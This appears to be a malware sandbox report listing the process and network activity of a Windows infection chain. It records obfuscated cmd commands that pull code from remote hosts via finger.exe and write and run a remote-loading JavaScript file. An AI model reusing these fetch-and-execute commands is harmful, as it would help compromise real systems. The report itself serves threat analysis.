Technical Information
- '<SYSTEM32>\finger.exe' ok@staafl.vneiufybu.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\bvZ.js"
- C:\users\public\bvz.js
- 'st####.vneiufybu.xyz':79
- 'dh#####uu6h.delira.buzz':80
- DNS ASK st####.vneiufybu.xyz
- DNS ASK dh#####uu6h.delira.buzz
- '<SYSTEM32>\cmd.exe' /c finger ok@staafl.vneiufybu.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt UNRU=.j&&SEt MGJJI=vYEZcarYEZc a =YEZc 'scYEZcriYEZcptYEZc:'; b =YEZc 'hYEZcTtPYEZc:'; GYEZcetYEZcObjYEZcecYEZct(YEZca+b+'&&sET PBMM=SLGABSLGABdhey8uauu6h.delira.buzzSLGAB?1SLGAB')&...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p XGF3F="%MGJJI:YEZc=%%PBMM:SLGAB=/%" 0<nul 1>C:\Users\Public\bvZ%UNRU%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\bvZ%UNRU%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\bvZ.js